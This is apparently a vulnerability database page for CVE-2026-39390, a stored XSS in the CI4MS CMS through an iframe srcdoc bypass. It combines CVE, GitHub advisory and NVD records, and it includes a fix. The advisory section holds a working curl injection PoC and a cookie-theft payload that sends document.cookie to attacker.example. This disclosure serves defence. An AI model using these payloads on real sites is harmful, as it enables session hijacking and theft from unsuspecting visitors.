Vulnerability-Lookup

CVE-2026-39390 (GCVE-0-2026-39390)

Vulnerability from cvelistv5 – Published: 2026-04-08 14:29 – Updated: 2026-04-08 16:13

Title

CI4MS has Stored XSS via srcdoc attribute bypass in Google Maps iframe setting

Summary

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Google Maps iframe setting (cMap field) in compInfosPost() sanitizes input using strip_tags() with an <iframe> allowlist and regex-based removal of on\w+ event handlers. However, the srcdoc attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an <iframe srcdoc="..."> payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors. This vulnerability is fixed in 0.31.4.0.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

https://github.com/ci4-cms-erp/ci4ms/security/adv…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	ci4-cms-erp	ci4ms	Affected: < 0.31.4.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-39390",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-08T16:09:31.073850Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-08T16:13:16.580Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ci4ms",
          "vendor": "ci4-cms-erp",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.31.4.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Google Maps iframe setting (cMap field) in compInfosPost() sanitizes input using strip_tags() with an \u003ciframe\u003e allowlist and regex-based removal of on\\w+ event handlers. However, the srcdoc attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an \u003ciframe srcdoc=\"...\"\u003e payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors. This vulnerability is fixed in 0.31.4.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-08T14:29:28.500Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2"
        }
      ],
      "source": {
        "advisory": "GHSA-x3hr-cp7x-44r2",
        "discovery": "UNKNOWN"
      },
      "title": "CI4MS has Stored XSS via srcdoc attribute bypass in Google Maps iframe setting"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-39390",
    "datePublished": "2026-04-08T14:29:28.500Z",
    "dateReserved": "2026-04-06T22:06:40.516Z",
    "dateUpdated": "2026-04-08T16:13:16.580Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-39390\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-08T15:16:13.750\",\"lastModified\":\"2026-04-08T21:26:13.410\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Google Maps iframe setting (cMap field) in compInfosPost() sanitizes input using strip_tags() with an \u003ciframe\u003e allowlist and regex-based removal of on\\\\w+ event handlers. However, the srcdoc attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an \u003ciframe srcdoc=\\\"...\\\"\u003e payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors. This vulnerability is fixed in 0.31.4.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-39390\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-08T16:09:31.073850Z\"}}}], \"references\": [{\"url\": \"https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-08T16:09:40.094Z\"}}], \"cna\": {\"title\": \"CI4MS has Stored XSS via srcdoc attribute bypass in Google Maps iframe setting\", \"source\": {\"advisory\": \"GHSA-x3hr-cp7x-44r2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 5.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"ci4-cms-erp\", \"product\": \"ci4ms\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.31.4.0\"}]}], \"references\": [{\"url\": \"https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2\", \"name\": \"https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Google Maps iframe setting (cMap field) in compInfosPost() sanitizes input using strip_tags() with an \u003ciframe\u003e allowlist and regex-based removal of on\\\\w+ event handlers. However, the srcdoc attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an \u003ciframe srcdoc=\\\"...\\\"\u003e payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors. This vulnerability is fixed in 0.31.4.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-08T14:29:28.500Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-39390\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-08T16:13:16.580Z\", \"dateReserved\": \"2026-04-06T22:06:40.516Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-08T14:29:28.500Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-X3HR-CP7X-44R2

Vulnerability from github – Published: 2026-04-08 19:15 – Updated: 2026-04-08 19:15

Summary

CI4MS has stored XSS via srcdoc attribute bypass in Google Maps iframe setting

Details

Summary

The Google Maps iframe setting (cMap field) in compInfosPost() sanitizes input using strip_tags() with an <iframe> allowlist and regex-based removal of on\w+ event handlers. However, the srcdoc attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an <iframe srcdoc="..."> payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors.

Details

Input sanitization (modules/Settings/Controllers/Settings.php:49-53):

$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));
$mapValue = preg_replace('/\bon\w+\s*=\s*"[^"]*"/i', '', $mapValue);
$mapValue = preg_replace('/\bon\w+\s*=\s*\'[^\']*\'/i', '', $mapValue);
$mapValue = preg_replace('/\bon\w+\s*=\s*[^\s>]+/i', '', $mapValue);
setting()->set('Gmap.map_iframe', $mapValue);

The three regex patterns only match attributes beginning with on (e.g., onclick, onerror). The srcdoc attribute does not begin with on and passes through untouched.

Output rendering (app/Views/templates/default/gmapiframe.php:3):

<?php echo strip_tags($settings->map_iframe,'<iframe>') ?>

The output applies strip_tags with the same <iframe> allowlist but performs no attribute filtering or HTML encoding. The stored payload is rendered verbatim.

Why HTML entities bypass strip_tags: A payload like <iframe srcdoc="<script>alert(1)</script>"> contains only one tag (<iframe>), which is in the allowlist. The entity-encoded content (<script>) is not recognized as a tag by strip_tags. However, when the browser renders the srcdoc attribute, it decodes the HTML entities and creates a new browsing context containing <script>alert(1)</script>.

Why this is same-origin: Per the HTML specification, an <iframe srcdoc="..."> without a sandbox attribute inherits the parent document's origin. The injected script has full access to the parent page's cookies, DOM, and session.

PoC

Prerequisites: Authenticated admin session with update role on the Settings module.

Step 1: Inject the payload

curl -X POST 'https://target/backend/settings/compInfos' \
  -H 'Cookie: ci_session=ADMIN_SESSION_ID' \
  -d 'cName=TestCo&cAddress=123+Main+St&cPhone=1234567890&cMail=admin@example.com&cMap=%3Ciframe+srcdoc%3D%22%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B%2Fscript%26gt%3B%22%3E%3C%2Fiframe%3E'

The cMap value decodes to:

<iframe srcdoc="&lt;script&gt;alert(document.domain)&lt;/script&gt;"></iframe>

Step 2: Visit any public page that includes the Google Maps widget

Navigate to the frontend contact or footer page as an unauthenticated visitor. The browser renders the srcdoc iframe, decodes the entities, and executes the script in the parent page's origin.

Expected result: JavaScript alert(document.domain) fires showing the target's domain, confirming same-origin execution.

Cookie theft variant:

<iframe srcdoc="&lt;script&gt;document.location='https://attacker.example/steal?c='+document.cookie&lt;/script&gt;"></iframe>

Impact

Stored XSS affecting all frontend visitors: The payload persists in the settings database and executes for every unauthenticated visitor viewing pages that include the Google Maps iframe widget.
Session hijacking: The script executes in the parent page's origin, giving access to session cookies (unless HttpOnly is set) and the full DOM.
Credential theft: An attacker can inject a fake login form or redirect users to a phishing page.
Scope change: The attack crosses from the admin backend trust boundary to the public frontend, affecting users who have no relationship with the backend.

The attack requires a compromised or malicious admin account with settings update permission. While this is a privileged starting point (PR:H), the impact crosses to all unauthenticated visitors (S:C), justifying Medium severity.

Recommended Fix

Replace the regex-based attribute blocklist with a strict allowlist approach. Only allow src, width, height, frameborder, style, allowfullscreen, and loading attributes on iframe tags:

// In modules/Settings/Controllers/Settings.php, replace lines 49-52:
$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));
// Strip all attributes except safe ones for iframes
$mapValue = preg_replace_callback(
    '/<iframe\s+([^>]*)>/i',
    function ($matches) {
        $allowedAttrs = ['src', 'width', 'height', 'frameborder', 'style', 'allowfullscreen', 'loading', 'title'];
        preg_match_all('/(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\S+))/i', $matches[1], $attrs, PREG_SET_ORDER);
        $safe = '';
        foreach ($attrs as $attr) {
            $name = strtolower($attr[1]);
            $value = $attr[2] ?: $attr[3] ?: $attr[4];
            if (in_array($name, $allowedAttrs, true)) {
                // For src, only allow https URLs (block javascript: etc.)
                if ($name === 'src' && !preg_match('#^https://#i', $value)) {
                    continue;
                }
                $safe .= ' ' . $name . '="' . esc($value) . '"';
            }
        }
        return '<iframe' . $safe . '>';
    },
    $mapValue
);

This allowlist approach ensures that dangerous attributes like srcdoc, src with javascript: protocol, and any future dangerous attributes are blocked by default.

Severity ?

5.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.31.3.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "ci4-cms-erp/ci4ms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.31.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39390"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T19:15:21Z",
    "nvd_published_at": "2026-04-08T15:16:13Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe Google Maps iframe setting (`cMap` field) in `compInfosPost()` sanitizes input using `strip_tags()` with an `\u003ciframe\u003e` allowlist and regex-based removal of `on\\w+` event handlers. However, the `srcdoc` attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an `\u003ciframe srcdoc=\"...\"\u003e` payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors.\n\n## Details\n\n**Input sanitization** (`modules/Settings/Controllers/Settings.php:49-53`):\n\n```php\n$mapValue = trim(strip_tags($this-\u003erequest-\u003egetPost(\u0027cMap\u0027), \u0027\u003ciframe\u003e\u0027));\n$mapValue = preg_replace(\u0027/\\bon\\w+\\s*=\\s*\"[^\"]*\"/i\u0027, \u0027\u0027, $mapValue);\n$mapValue = preg_replace(\u0027/\\bon\\w+\\s*=\\s*\\\u0027[^\\\u0027]*\\\u0027/i\u0027, \u0027\u0027, $mapValue);\n$mapValue = preg_replace(\u0027/\\bon\\w+\\s*=\\s*[^\\s\u003e]+/i\u0027, \u0027\u0027, $mapValue);\nsetting()-\u003eset(\u0027Gmap.map_iframe\u0027, $mapValue);\n```\n\nThe three regex patterns only match attributes beginning with `on` (e.g., `onclick`, `onerror`). The `srcdoc` attribute does not begin with `on` and passes through untouched.\n\n**Output rendering** (`app/Views/templates/default/gmapiframe.php:3`):\n\n```php\n\u003c?php echo strip_tags($settings-\u003emap_iframe,\u0027\u003ciframe\u003e\u0027) ?\u003e\n```\n\nThe output applies `strip_tags` with the same `\u003ciframe\u003e` allowlist but performs no attribute filtering or HTML encoding. The stored payload is rendered verbatim.\n\n**Why HTML entities bypass `strip_tags`**: A payload like `\u003ciframe srcdoc=\"\u0026lt;script\u0026gt;alert(1)\u0026lt;/script\u0026gt;\"\u003e` contains only one tag (`\u003ciframe\u003e`), which is in the allowlist. The entity-encoded content (`\u0026lt;script\u0026gt;`) is not recognized as a tag by `strip_tags`. However, when the browser renders the `srcdoc` attribute, it decodes the HTML entities and creates a new browsing context containing `\u003cscript\u003ealert(1)\u003c/script\u003e`.\n\n**Why this is same-origin**: Per the HTML specification, an `\u003ciframe srcdoc=\"...\"\u003e` without a `sandbox` attribute inherits the parent document\u0027s origin. The injected script has full access to the parent page\u0027s cookies, DOM, and session.\n\n## PoC\n\n**Prerequisites**: Authenticated admin session with `update` role on the Settings module.\n\n**Step 1: Inject the payload**\n\n```bash\ncurl -X POST \u0027https://target/backend/settings/compInfos\u0027 \\\n  -H \u0027Cookie: ci_session=ADMIN_SESSION_ID\u0027 \\\n  -d \u0027cName=TestCo\u0026cAddress=123+Main+St\u0026cPhone=1234567890\u0026cMail=admin@example.com\u0026cMap=%3Ciframe+srcdoc%3D%22%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B%2Fscript%26gt%3B%22%3E%3C%2Fiframe%3E\u0027\n```\n\nThe `cMap` value decodes to:\n```html\n\u003ciframe srcdoc=\"\u0026lt;script\u0026gt;alert(document.domain)\u0026lt;/script\u0026gt;\"\u003e\u003c/iframe\u003e\n```\n\n**Step 2: Visit any public page that includes the Google Maps widget**\n\nNavigate to the frontend contact or footer page as an unauthenticated visitor. The browser renders the `srcdoc` iframe, decodes the entities, and executes the script in the parent page\u0027s origin.\n\n**Expected result**: JavaScript `alert(document.domain)` fires showing the target\u0027s domain, confirming same-origin execution.\n\n**Cookie theft variant**:\n```\n\u003ciframe srcdoc=\"\u0026lt;script\u0026gt;document.location=\u0027https://attacker.example/steal?c=\u0027+document.cookie\u0026lt;/script\u0026gt;\"\u003e\u003c/iframe\u003e\n```\n\n## Impact\n\n- **Stored XSS affecting all frontend visitors**: The payload persists in the settings database and executes for every unauthenticated visitor viewing pages that include the Google Maps iframe widget.\n- **Session hijacking**: The script executes in the parent page\u0027s origin, giving access to session cookies (unless HttpOnly is set) and the full DOM.\n- **Credential theft**: An attacker can inject a fake login form or redirect users to a phishing page.\n- **Scope change**: The attack crosses from the admin backend trust boundary to the public frontend, affecting users who have no relationship with the backend.\n\nThe attack requires a compromised or malicious admin account with settings update permission. While this is a privileged starting point (PR:H), the impact crosses to all unauthenticated visitors (S:C), justifying Medium severity.\n\n## Recommended Fix\n\nReplace the regex-based attribute blocklist with a strict allowlist approach. Only allow `src`, `width`, `height`, `frameborder`, `style`, `allowfullscreen`, and `loading` attributes on iframe tags:\n\n```php\n// In modules/Settings/Controllers/Settings.php, replace lines 49-52:\n$mapValue = trim(strip_tags($this-\u003erequest-\u003egetPost(\u0027cMap\u0027), \u0027\u003ciframe\u003e\u0027));\n// Strip all attributes except safe ones for iframes\n$mapValue = preg_replace_callback(\n    \u0027/\u003ciframe\\s+([^\u003e]*)\u003e/i\u0027,\n    function ($matches) {\n        $allowedAttrs = [\u0027src\u0027, \u0027width\u0027, \u0027height\u0027, \u0027frameborder\u0027, \u0027style\u0027, \u0027allowfullscreen\u0027, \u0027loading\u0027, \u0027title\u0027];\n        preg_match_all(\u0027/(\\w+)\\s*=\\s*(?:\"([^\"]*)\"|\\\u0027([^\\\u0027]*)\\\u0027|(\\S+))/i\u0027, $matches[1], $attrs, PREG_SET_ORDER);\n        $safe = \u0027\u0027;\n        foreach ($attrs as $attr) {\n            $name = strtolower($attr[1]);\n            $value = $attr[2] ?: $attr[3] ?: $attr[4];\n            if (in_array($name, $allowedAttrs, true)) {\n                // For src, only allow https URLs (block javascript: etc.)\n                if ($name === \u0027src\u0027 \u0026\u0026 !preg_match(\u0027#^https://#i\u0027, $value)) {\n                    continue;\n                }\n                $safe .= \u0027 \u0027 . $name . \u0027=\"\u0027 . esc($value) . \u0027\"\u0027;\n            }\n        }\n        return \u0027\u003ciframe\u0027 . $safe . \u0027\u003e\u0027;\n    },\n    $mapValue\n);\n```\n\nThis allowlist approach ensures that dangerous attributes like `srcdoc`, `src` with `javascript:` protocol, and any future dangerous attributes are blocked by default.",
  "id": "GHSA-x3hr-cp7x-44r2",
  "modified": "2026-04-08T19:15:21Z",
  "published": "2026-04-08T19:15:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39390"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ci4-cms-erp/ci4ms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CI4MS has stored XSS via srcdoc attribute bypass in Google Maps iframe setting"
}

FKIE_CVE-2026-39390

Vulnerability from fkie_nvd - Published: 2026-04-08 15:16 - Updated: 2026-04-08 21:26

Severity ?

5.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Google Maps iframe setting (cMap field) in compInfosPost() sanitizes input using strip_tags() with an \u003ciframe\u003e allowlist and regex-based removal of on\\w+ event handlers. However, the srcdoc attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an \u003ciframe srcdoc=\"...\"\u003e payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors. This vulnerability is fixed in 0.31.4.0."
    }
  ],
  "id": "CVE-2026-39390",
  "lastModified": "2026-04-08T21:26:13.410",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-08T15:16:13.750",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-39390 (GCVE-0-2026-39390)

GHSA-X3HR-CP7X-44R2

Summary

Details

PoC

Impact

Recommended Fix

FKIE_CVE-2026-39390

Tags

Sightings

Nomenclature